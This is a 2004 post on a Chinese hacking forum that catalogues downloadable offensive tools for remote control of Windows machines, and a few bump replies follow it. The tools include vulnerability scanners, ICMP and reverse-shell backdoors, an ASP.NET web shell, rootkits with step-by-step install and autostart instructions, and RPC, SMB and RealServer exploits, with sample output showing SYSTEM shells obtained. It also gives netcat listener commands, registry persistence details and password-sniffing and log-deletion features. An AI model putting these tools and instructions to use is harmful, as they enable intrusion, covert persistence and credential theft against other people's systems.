|
 | 作者: qd_xway [qd_xway]
 论坛用户 |
登录 |
| 下载地址:带说明 http://wmjie.51.net/swords/tool.htm 扫描工具 scanms(下载) ISS安全公司07月30日发布,运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOM RPC 接口远程缓冲区溢出漏洞(823980-MS03-026)”补丁程序。如果没有安装补丁程序,该IP地址就会显示出[VULN]。 C:\>scanms.exe 192.168.0.1-192.168.0.254 192.168.0.2 [Windows XP] [ptch] [ptch] 5.6 192.168.0.5 [unknown010] [VULN] [VULN] 5.1 StealthWaspPortScanner1.2(下载) StealthWasp Port Scanner v1.2,基于GUI界面非常简单很容易使用的端口扫描工具 awsps461(下载) Atelier Web Security Port Scanner扫描功能挺完全的工具! 包里的epf21.zip和vicv20.zip是Atelier Web Security Port Scanner的Plug-ins 注意这个两个Plug-ins只可以在NT/2000/XP下使用 后门工具 icmpdoor(下载) 本后门利用ICMP数据包进行通信,不开端口。安装成系统服务,开机自动运行。可以穿透一些防火墙。 icmpsrv.exe :服务端程序,使用 -install(-remove御载)参数安装成服务。 icmpsend.exe :客户端程序。使用icmpsend IP进行控制。 ICMP_Backdoor命令说明: [http://xxx.xxx.xxx/admin.exe -hacker.exe] http下载文件,保存在目标主机\\system32\目录下,文件名为hacker.exe(可改)。参数hacker.exe,前面的“-”不能省去 [pslist] 列出远程主机的进程名称和pid [pskill id] 杀进程号为id的进程 输入普通cmd命令,则远程主机执行相关命令。 binder2(下载) binder2.exe 反弹式后门程序 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358.程序会复制自身到c:\winnt\下名为syslog.exe,并在HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.) 压缩包中含源码,建议按需更改代码后使用. T-Cmd(下载) 自动为远程/本地主机创建服务级后门,无须使用任何额外的命令,支持本地/远程模式。 重启后,程序仍然自动运行。监听端口20540/tcp。 远程安装/卸载时,需提供管理员权限(Admin)的用户名及密码,若密码为空,请用"NULL"代替。 另附源代码。 ackcmd(下载) 一个ICMP通道的后门工具,能够穿越某些规则配置的防火墙。 iCmd.exe(下载) 比起ncx.exe及ncx99.exe,这玩意有趣多了! iis_backdoor(下载) IIS后门 使用方法:将本软件放在服务器上运行即可安装后门,通过IIS端口(一般是80)连接,可以穿透防火墙。 TiniFTPD(下载) 一个简单的命令行中的FTP服务程序,具有一般的FTP服务的功能,支持Pasv,Port两种模式,支持fxp,支持上传,下载,删除,建目录,远程执行等操作。最多允许128个连接,每个IP最多可以同时登陆三次,在180秒到210内都没有操作的话,会自动将连接用户断开。程序是支持断点再传的。 svchost(下载) 功能可以对开着web服务的防火墙机器。利用http端口重用技术,穿透防火墙,用法,在目标机器安装后,telnet ip 80端口就ok ntrootkit(下载) 本ntrootkit采用无连接协议,不开端口,有四种协议可以选择(0:userdefined,1:icmp,2:udp,3:tcp),注意第三种 方式,它只是使用了tcp数据包进行通讯,并没有建立tcp连接,用这种方式只要把目标端口设置成任意一个目标机器上 开的端口,一般都会成功的机会很大。它隐藏进程,文件,目录,服务,注册表项,提供一些很有用的命令。 BlueAngel(下载) BlueAngel后门 配置好以后可以用Telnet,如果后台CMD出错可用上下箭头激活。 aspxshell(下载) asp.net web后门代码(web shell) 前提是服务器上已经装了.net framework了。 WinEggDropShell Pro 加强版(下载) WinEggDropShell Pro 加强版,这是一款扩展型的telnet后门程序,具有小型、功能丰富和全面、十分完美的在线帮助等特点,内包含压缩和未压缩版本。 具体功能如下: A.进程管理-->查看,杀进程(支持用进程名或PID来杀进程) B.注册表管理(只对hklm分支下作管理) C.服务管理(停止,启动,枚举,配置,删除服务等功能) D.端口到程序关联功能 E.系统重启,关电源,注销等功能 F.嗅探密码功能 G.安装终端,修改终端端口功能 H.端口重定向功能(多线程) I.HTTP服务功能(多线程) J.Sock5代理功能(支持两种不同方式验证) K.克隆帐号功能 L.加强了的Findpassword功能(可以得到所有登陆用户,包括使用克隆帐户远程登陆用户密码) M.其它附助功能,http下载,删除日志,系统信息,恢复常用关联,枚举系统帐户等 _root_.zip(下载) 一个Rootkit: 解压后有以下几个文件 ----------------------------------------- adv.exe ;安装/删除Rootkit install.bat ;我写的安装bat remove.bat ;我写的删除bat sc.exe ;呵呵~这个不用说吧! _root_.sys ;Rootkit ----------------------------------------- 使用方法: 将"_root_.sys"复制到"C:\" 下,必须放到"C:\"下 不然adv.exe 会找不到 Rootkit的 , 运行 "adv l" 就会安装Rootkit , 这里把Rootkit安装成服务,可以使用 net start _root_ 启动 Rootkit net stop _root_ 停止 Rootkit 删除方法 运行 "adv u"后.删除所有文件即可 因为使用 adv安装的rootkit 并不会自动启动 所以我们使用sc.exe 把他的启动方式改为自动 用法 :sc config _root_ start= Auto 我已经把安装过程写了个install.bat, 直接运行install 即可安装好Rootkit 功能: 这个Rootkit 很小,功能也比较简单 运行后所有以 "_root_" 开头的进程,文件 及目录都将隐藏. 虽然这里把 Rootkit安装为服务,但是 并不会在服务管理器里出现, 还有一种启动方法,不安装为服务直接启 动Rootkit,但是机器重启后Rootkit将不再 运行,我在这里就不提供了。 http_rat(下载) 一个国外新出的后门,用C语言编写,运行平台win9x/2000/xp。控制者可以通过浏览器地址栏输http://ip地址:端口来控制对方的机器,对方IP可以通过指定邮箱地址来收取,这在设置客户端时可以设定。 攻击工具 2ksystem(下载) 在NT和2000下将任意用户提升到SYSTEM级别的权限的工具,具体用法以及源代码见压缩包内。 Gsu(下载) Solaris 8提升权限攻击程序。 kaht2(下载) Rpc DCOM批量溢出工具。 re(下载) 天行的Microsoft Rpc Locator Service的攻击程序,可以使远程攻击者获取system权限. 例子: e:\tools.dos>re -h 10.24.9.100 Microsoft Rpc Locator Service Exploit Web : www.tianxing.org www.tophacker.net Email : tianxing@163.net Thanks: yuange. [!] Connecting to 10.24.9.100 [$] Connected 10.24.9.100! [+] Exploiting 10.24.9.100! [>] Sending shellcode! [!] Connected! Here comes the shell baby... Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32> RPC2(下载) 图形版的RPC溢出程序.加了FTP和端口扫描. smbdie(下载) MS02-045 Exploit.Any unpatched WinNT/2K/XP or .NET machine on your network that's listening on port 139 and/or 445 can be crashed in about two seconds with a malformed SMB packet. snot(下载) snot 一个针对ids的拒绝服务工具,以snort的rule作为输入,Snot是一个任意包生成器,使用snort规则文件作为它的包信息源。可实时生成任意的未包含于规则中的信息,以牵制snort规则'snot 检测'的生成。 sqlexec(下载) 在知道SQL的用户名密码情况下执行命令的程序,用VC6写成,包括源代码 THCREALbad(下载) 使用方法: H:\THCREALbad>thcrealbad 127.0.0.1 0 THCREALbad v0.4 - Wind0wZ & Linux remote root sploit for Realservers 7,8,9 by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com) .......................................... ok now try to connect to port 31337 via netcat ! H:\THCREALbad>telnet 127.0.0.1 31337 Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\winnt\system32> T-SysCmd-1.0(下载) T-SysCmd v1.0 Author: Brief E-Mail: Brief@fz5fz.org HomePage: www.fz5fz.org && www.safechina.net Date: 08-06-2003 本程序为一款基于IDT的攻击程序,也可以说是Windows系统下的内核级后门程序。 它可为任意用户(包括Guest)提供SYSTEM权限级别的Command。 适应平台: Intel x86 Family, Windows 2000/XP。 xHijack(下载) 交换环境下的会话劫持(For windows2000)工具 windows2000 + winpcap2.3下运行。 suq_diq(下载) 一个用汇编编写的加解密工具,用来对IBM Net.Commerce, WebSphere或者其它利用TripleDES算法的IBM或者Lotus的软件。配合一些cgi漏洞,会造成很大危害。 Copyright© 2004-2005 Swords All Right Reserved. [此贴被 Swords(qd_xway) 在 08月18日12时13分 编辑过] [此贴被 Swords(qd_xway) 在 08月18日12时14分 编辑过] |
| 地主 发表时间: 04-05-22 16:32 |
| 回复: qd_xway [qd_xway] 论坛用户 |
登录 |
|
自己先顶!看的好的帮顶~ |
| B1层 发表时间: 04-05-22 16:35 |
 | 回复: BrideX [bridex]  论坛用户 |
登录 |
|
过水无痕..可认识否? |
| B2层 发表时间: 04-05-22 20:55 |
| 回复: Swords [qd_xway] 论坛用户 |
登录 |
|
ding @! |
| B3层 发表时间: 04-08-18 12:13 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 远程控制专题